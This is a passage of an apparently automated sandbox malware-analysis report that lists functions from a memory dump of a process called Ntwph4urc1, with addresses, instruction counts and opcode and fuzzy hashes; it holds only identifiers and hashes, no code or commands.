                                            • Opcode ID: bad4a5e6cba79d3f04186e8280883affcc637a1da78437174c880171a5eb8095
                                            • Instruction ID: ab296ad3bf0f043744e6ff38c7e5edea69348083e0858cf85858d6fe79615535
                                            • Opcode Fuzzy Hash: bad4a5e6cba79d3f04186e8280883affcc637a1da78437174c880171a5eb8095
                                            • Instruction Fuzzy Hash: BA51CEB15103409FE321DF69CD85F5A77E9EF85764F20062DEA119B292DB31E806CBA3
                                            Function 3694B2D3 Relevance: .2, Instructions: 161COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5103321dab8aab490e4d481d3d83a609e71d397db34cc6ec456087fba3eefd3d
                                            • Instruction ID: 7a2994d6639048270216f1f7de3ab58cf3c78cdc875f2b3a12d6a8c467c9503d
                                            • Opcode Fuzzy Hash: 5103321dab8aab490e4d481d3d83a609e71d397db34cc6ec456087fba3eefd3d
                                            • Instruction Fuzzy Hash: 28411071601700DBE727DF2ACC80B16B7B9EF457A4F61442AE659DB395DB319C01CB90
                                            Function 369795DA Relevance: .2, Instructions: 160COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7e63e108a4a07114b6f509949c721876efaae6843128505c5f869ca4065d393d
                                            • Instruction ID: d72444e9b07fa465a0a48be55462ccc788f9b06d923d9f9896d3859f1c41c46a
                                            • Opcode Fuzzy Hash: 7e63e108a4a07114b6f509949c721876efaae6843128505c5f869ca4065d393d
                                            • Instruction Fuzzy Hash: 67516770910318AFEF21CFA5CC81BDDBBB9FF06344F60412AE594AB192DB719948DB51
                                            Function 36963740 Relevance: .2, Instructions: 159COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 51854e45b76722a4e020319cb4b3ca64e909f94aa7a182a94af02a83b5fd5b4e
                                            • Instruction ID: 40149bf8f5d947afa8cb34f1d3d3cac4abd16ba45fc991ae31d96093b79ad7cb
                                            • Opcode Fuzzy Hash: 51854e45b76722a4e020319cb4b3ca64e909f94aa7a182a94af02a83b5fd5b4e
                                            • Instruction Fuzzy Hash: 8A51F179E10726DFE711CF6AC880699B7B4FF08728B205269E844DB751D734E991CBD0
                                            Function 36A1D26B Relevance: .2, Instructions: 153COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e34a641792a2e79be6bf0067dfbea21fe876c0422c27924c31e583a14ba6783b
                                            • Instruction ID: 7922560918c27ba0123f0ab885f9b7d53995045da41557c4c79043d694b9c50e
                                            • Opcode Fuzzy Hash: e34a641792a2e79be6bf0067dfbea21fe876c0422c27924c31e583a14ba6783b
                                            • Instruction Fuzzy Hash: 5F514C766083429FD701DF69C880B5ABBE5FFC8354F048A2DF9949B281D734E946CB92
                                            Function 369551ED Relevance: .1, Instructions: 149COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a80b7127ded1f595217fde907b39798ab154d820764d39f9290e48d27993a3be
                                            • Instruction ID: 7688f550cfb75e1a690fc122a11ac0e99b48c25aaaa3b4e133997dbedc083d51
                                            • Opcode Fuzzy Hash: a80b7127ded1f595217fde907b39798ab154d820764d39f9290e48d27993a3be
                                            • Instruction Fuzzy Hash: 19518C75A15315DFFB12CBA9CC80B9DB7B8AB04798F220018DA05EB252DBB5AD41CB91
                                            Function 369E3140 Relevance: .1, Instructions: 149COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c02abd8d1085a931b97900ce13360628fdb8deab9ad098f3153f1360481e4403
                                            • Instruction ID: c0d8abe432403cc9f8455c4e6ccc3a96b8715ce8fad888db7046d38ee2625ad3
                                            • Opcode Fuzzy Hash: c02abd8d1085a931b97900ce13360628fdb8deab9ad098f3153f1360481e4403
                                            • Instruction Fuzzy Hash: C951B972A04311DFE712CF55C880A9AB7E9EF88368F11852AF8949B350D734ED46CBD2
                                            Function 36953FC2 Relevance: .1, Instructions: 147COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e71afb649981161aad09c08b5442337666a4693f10e70ea9927b2040fb6632a6
                                            • Instruction ID: b97623972d2674ce0153b21ddba792689ce0224a6f9e68f7113290346cffca3c
                                            • Opcode Fuzzy Hash: e71afb649981161aad09c08b5442337666a4693f10e70ea9927b2040fb6632a6
                                            • Instruction Fuzzy Hash: 7451BA75E00315CFDB14CFA9C890A8EBBF5BB58754F32852ADA54AB340DB30AD45CBA0
                                            Function 3698F71F Relevance: .1, Instructions: 143COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 66201631693fdec6644635552b2c5b7d1ea60620aa2be14ebb21a7ef909d98c6
                                            • Instruction ID: 0dbc3940a367e2e453b61dc80d283a18c3d41fccc4f5518b54fb557462a43443
                                            • Opcode Fuzzy Hash: 66201631693fdec6644635552b2c5b7d1ea60620aa2be14ebb21a7ef909d98c6
                                            • Instruction Fuzzy Hash: 524166B6D00339ABEB11DBA98C40AAFB7BCAF04794F510166E904F7601EA34DD05CBE1
                                            Function 36A235D7 Relevance: .1, Instructions: 139COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b2c300d7f86a03933703e09635872856e70952263eb4647515a482bdea46eec2
                                            • Instruction ID: b6d0ccea717e7b536aaa39ca3d93015606abdbac364f370fb976548f03b12f92
                                            • Opcode Fuzzy Hash: b2c300d7f86a03933703e09635872856e70952263eb4647515a482bdea46eec2
                                            • Instruction Fuzzy Hash: 95517EB5640606EFDB05CF15C980A56BBF9FF46348F1580BAE908DF222E771E945CB90
                                            Function 3695D534 Relevance: .1, Instructions: 138COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c09a94c6772d8e180decd02027e53b83413f09575d4e8a60a356dba088a45176
                                            • Instruction ID: e5df58570929a418209253fc9a603802aaf6a9fc5861492bfeda8efa5e591ef8
                                            • Opcode Fuzzy Hash: c09a94c6772d8e180decd02027e53b83413f09575d4e8a60a356dba088a45176
                                            • Instruction Fuzzy Hash: 8651F076B01791CFEB21CB19C840B1A73E9EB48B94F5600A5F900CB795DB74DC44DBA2
                                            Function 369CD1C0 Relevance: .1, Instructions: 135COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0eb649ebbf3548d8df43d0789ceff5cfbc550e3c64e1c06ae1f98d8f26ebe946
                                            • Instruction ID: be1064ca100a0360cdbaa705eb64c4c802f5c5b03b2be59f2328f94dcc9a5062
                                            • Opcode Fuzzy Hash: 0eb649ebbf3548d8df43d0789ceff5cfbc550e3c64e1c06ae1f98d8f26ebe946
                                            • Instruction Fuzzy Hash: 7B5138B5E00206DFDB08CF69C49169ABBF5FF48314B60816ED819A7345E734EA85CF91
                                            Function 3694B136 Relevance: .1, Instructions: 131COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4c5f322f698f6e1b61cfe021a3b3e72cd3c49e6eeeab11328c65eda2f9a5aa21
                                            • Instruction ID: c6b278b77fb2e7a57bcaf368ec263298a8f023cdb30ecc2deaccade4e3af7b96
                                            • Opcode Fuzzy Hash: 4c5f322f698f6e1b61cfe021a3b3e72cd3c49e6eeeab11328c65eda2f9a5aa21
                                            • Instruction Fuzzy Hash: 3141BAB1A40701EFEB22EF69CC80B1ABBF8AF14798F204469E5159B255DB70DC11CB91
                                            Function 3697D6E0 Relevance: .1, Instructions: 126COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 42578d418b2934b02e14574336dc27f399143a583e550deea5e69334c708406a
                                            • Instruction ID: e433a76730ee39dc890af08513ad4590ae8350e835a9f3ba10474f68c05e7700
                                            • Opcode Fuzzy Hash: 42578d418b2934b02e14574336dc27f399143a583e550deea5e69334c708406a
                                            • Instruction Fuzzy Hash: 4741F2B15047409FE721DF69CC80E5AB7A9EF85360F10062DEA1557392DB31EC17CBA2
                                            Function 36A1BEE6 Relevance: .1, Instructions: 115COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d3ecdc75845e4efcf9a5524340a0558ffaffa1f42db526757369321156727b28
                                            • Instruction ID: ef92c4d19b5cb74d2567c9e6c8a7ddaf44df3cbaa7c88da00ddae2329e94f516
                                            • Opcode Fuzzy Hash: d3ecdc75845e4efcf9a5524340a0558ffaffa1f42db526757369321156727b28
                                            • Instruction Fuzzy Hash: 1031447AB00650AFE3128BA5CD55F6ABBE9EF45784F044151FC428F341DA38DC80CBA0
                                            Function 369CFF42 Relevance: .1, Instructions: 107COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 124864328812020a14b75ef7b216ea4b458457dc5cb74b518c04f40ca1fb2ad8
                                            • Instruction ID: 0cd7346b7efd62605b7e9a48fd0b2d5569a9031fbdf4d7cb2bf50c21e19ea062
                                            • Opcode Fuzzy Hash: 124864328812020a14b75ef7b216ea4b458457dc5cb74b518c04f40ca1fb2ad8
                                            • Instruction Fuzzy Hash: A741CBB1D01208AFDB14CFA6C840BEEBBF9FF48755F60842AE910A7251DB359801CF10
                                            Function 36979274 Relevance: .1, Instructions: 105COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1b893f6da4a2040c8ce1c46c2f78542654c76a1c7921431be7393efaf3457c3f
                                            • Instruction ID: 6de9e97c33b18b4d1fc665fa51433bc50ebcdbc56a0b31f2a14e4a6bc7cf4059
                                            • Opcode Fuzzy Hash: 1b893f6da4a2040c8ce1c46c2f78542654c76a1c7921431be7393efaf3457c3f
                                            • Instruction Fuzzy Hash: 86318275A0072CAFEB21CB25CC40B9A77B9EF85754F510199A54CA7280DB309E45CF91
                                            Function 36987F51 Relevance: .1, Instructions: 104COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 991be0a160b167667d2e1f81ccca38596106b2c0819c6a22bd1a363d877f09be
                                            • Instruction ID: fc17004c00051c1554570333fd3ca421c83b5a50831d16dc2aa4e83ba20b3294
                                            • Opcode Fuzzy Hash: 991be0a160b167667d2e1f81ccca38596106b2c0819c6a22bd1a363d877f09be
                                            • Instruction Fuzzy Hash: D631CE75A01621CBE725CF2AC940AAF7BF9EF5579472580AEE445CB360EB30DC40C7A1
                                            Function 369FB2F0 Relevance: .1, Instructions: 103COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b022692fe8b9e9848fdc1893cbbaccaa8075d22d17f181ab9d2aff15b1c15f9d
                                            • Instruction ID: 9ef22a99e6dd4c0f964431667b335e3b74d8787ed4459b2f5f6eb6c81262f247
                                            • Opcode Fuzzy Hash: b022692fe8b9e9848fdc1893cbbaccaa8075d22d17f181ab9d2aff15b1c15f9d
                                            • Instruction Fuzzy Hash: D531CE71A61711CFD720CF1AC880A1AB7F9FF48366B76846DE4498F618D772E841CB80
                                            Function 36957E96 Relevance: .1, Instructions: 102COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4ccb0177d6147b0c4abe18ecd4a54e6acbfa7287a082c86dabab39786cf3b821
                                            • Instruction ID: 41770c6feaabd9bfaa7ca527b664fc9d0f5b7a72a65685f47f779c404e3c272c
                                            • Opcode Fuzzy Hash: 4ccb0177d6147b0c4abe18ecd4a54e6acbfa7287a082c86dabab39786cf3b821
                                            • Instruction Fuzzy Hash: 07316C70A01786BFE705DB75CD94BD9F758BF01148F25415AC51C8F202DB386A19DBE2
                                            Function 369750E4 Relevance: .1, Instructions: 101COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9736ef1e2d2fe6ed3e8edd6ff05ccc53a0216fb05e956db353e68a80ecb75403
                                            • Instruction ID: 63a7f8c8e2968b29aff51be90c9666ef58c01ac48e8f54fe03b23e4cf0bf3681
                                            • Opcode Fuzzy Hash: 9736ef1e2d2fe6ed3e8edd6ff05ccc53a0216fb05e956db353e68a80ecb75403
                                            • Instruction Fuzzy Hash: 68312231A08351DBEB61CE29C840757B7A8AF84795F64812AF8848B285DE34CC41C7E2
                                            Function 3694DEA5 Relevance: .1, Instructions: 98COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a36d76ad62eb14ba1d93e45d5da57c7e8db5234a726b9b567eb27928172412ad
                                            • Instruction ID: 0b7f59caa61ff939aad117d359e1d3957ddfa94cf0f1840bca58ea2d3fb5d868
                                            • Opcode Fuzzy Hash: a36d76ad62eb14ba1d93e45d5da57c7e8db5234a726b9b567eb27928172412ad
                                            • Instruction Fuzzy Hash: F131BCB5601701DFD32ACF19CC90A6AB3B9EF84348B61855DE1098B752EB72EC46CBD0
                                            Function 36949730 Relevance: .1, Instructions: 96COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID:
                                            • API String ID: 3446177414-0
                                            • Opcode ID: adb54e3dc2ad614e3548d659d834c4adb24ddd030e8c0e1162e0d2dc370008eb
                                            • Instruction ID: a38e841fee405b283ad70b89bcb2ada0dc7f095f04b84e1c235680885246a11d
                                            • Opcode Fuzzy Hash: adb54e3dc2ad614e3548d659d834c4adb24ddd030e8c0e1162e0d2dc370008eb
                                            • Instruction Fuzzy Hash: 8021F276918714AFE723EF5AC800B0A7BF9FB84B64F210429AA559B341DB35DC01CB91
                                            Function 3694D6AA Relevance: .1, Instructions: 93COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 759af7da7484718429cce7f3e89ec17e8e493d8f66f8a62f4e587b70ab487789
                                            • Instruction ID: dc1ee6634b267e0fd60e422d167c20f9f3bf8ea251e8c5bce0cd00d50dd7d29a
                                            • Opcode Fuzzy Hash: 759af7da7484718429cce7f3e89ec17e8e493d8f66f8a62f4e587b70ab487789
                                            • Instruction Fuzzy Hash: E731E1BEA05304AFEB23EE55C980B5E73EDEB84794F228429EC049B201D770DD48CB90
                                            Function 3694DE10 Relevance: .1, Instructions: 91COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f12ca3b2acced05fecadcdf59cde285bbc34f8445301a10fa8c700101f1cd99f
                                            • Instruction ID: 85435412a8ece36caef57c4f5fd857fb611c1e23dd29e24d77524ffac2dda799
